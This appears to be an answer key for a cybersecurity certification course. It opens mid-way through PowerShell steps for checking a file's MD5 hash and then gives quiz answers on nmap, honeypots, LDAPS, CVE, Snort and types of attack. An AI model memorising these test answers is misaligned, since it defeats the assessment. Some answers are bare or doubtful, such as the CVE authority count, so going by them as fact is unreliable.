   a. Right-click Start and select Windows PowerShell (Admin).
   b. At the prompt, type cd \downloads and press Enter to navigate to the directory that contains the files.
   c. Type dir and press Enter to view the available files.
2. Obtain the hashes for the new release of the software.
   a. Type get-filehash ThreatProtec.zip -a md5 and press Enter to view the MD5 hash for the new release.
   b. Type get-content ThreatProtec_hash.txt and press Enter to view the known hash contained in the .txt file.
3. Compare the hashes and answer the question.
   a. Type "calculated hash" -eq "known hash" and press Enter to determine if the file hashes match.
   b. In the top right, select Answer Questions.
   c. Answer the question.
   d. Select Score Lab.
1- YES

A new OpenSSH vulnerability has been discovered. You are tasked with finding all systems running an SSH service on the network. The nmap 192.168.122.0/24 command has been run to find all potentially vulnerable systems, and the output is shown below. Which machines on the following IP addresses will likely need their SSH software updated immediately? (Select two.)

192.168.122.82 192.168.122.1

Your company has decided to use a Pentbox honeypot to learn which types of attacks may be targeting your site. They have asked you to install and configure the honeypot. You have already installed Pentbox. Which menu allows you to configure the honeypot?

2- Network tools

Which of the following frequency ranges does Bluetooth operate in?

2.4 GHz

By default, Lightweight Directory Access Protocol (LDAP) is unsecure, but it should not be blocked since it is widely used in normal operations. Instead, you should use the secure version. Which of the following ports is used for the secure version of LDAP?

636

How many numbering authorities comprise the CVE?

94

Which of the following would be good for multiple domains and subdomains?

A (SAN) certificate

The information below is from Wireshark. Which kind of attack is occurring?

A DDoS attack

You are in the process of configuring pfSense Snort as your intrusion detection and prevention system (IDS/IPS). You have configured the options shown in the image, but when you try to save your changes, pfSense won't let you continue. What did you forget to configure?

A Snort Oinkmaster Code was not entered.

Which of the following BEST describes a cacheable system?

A client cache has the right to reuse response data for equivalent requests that come later.

Which of the following are characteristics of a RESTful API? (Select two.)

A client-server architecture managed through HTTP. A layered system that organizes server types.

Members of the executive team have asked for an explanation as to why the bit size of an encryption key needs to be higher than the 56-bit RC4 they are using. They show you a screenshot of the research they've done on the powerful desktop computer they run, saying that none of the keys they are using will be in production for more than a year. They want to just keep using the smaller keys. How would you answer them?

A cluster or use of cloud computing could break this in a very short period of time.

You are the security analyst working for CorpNet (198.28.1.1). You are trying to see if you can discover weaknesses in your network. You have just run the nmap command shown in the image. Which weakness, if any, was found?

A compromise was found while scanning port 8080.

Which of the following BEST describes phishing?

A cyberattack in which an email purporting to be from a legitimate organization is sent with a malicious payload.

The DKIM tool can provide security for your company's emails because it contains which of the following?

A digital signature

You are monitoring network activity and find that a user appears to be logging into the network and downloading files, even though you know that user is on vacation. Which kind of attack have you MOST likely experienced?

A horizontal privilege escalation attack

Which answer BEST describes the purpose of CVE?

A list of standardized identifiers for known software vulnerabilities and exposures.

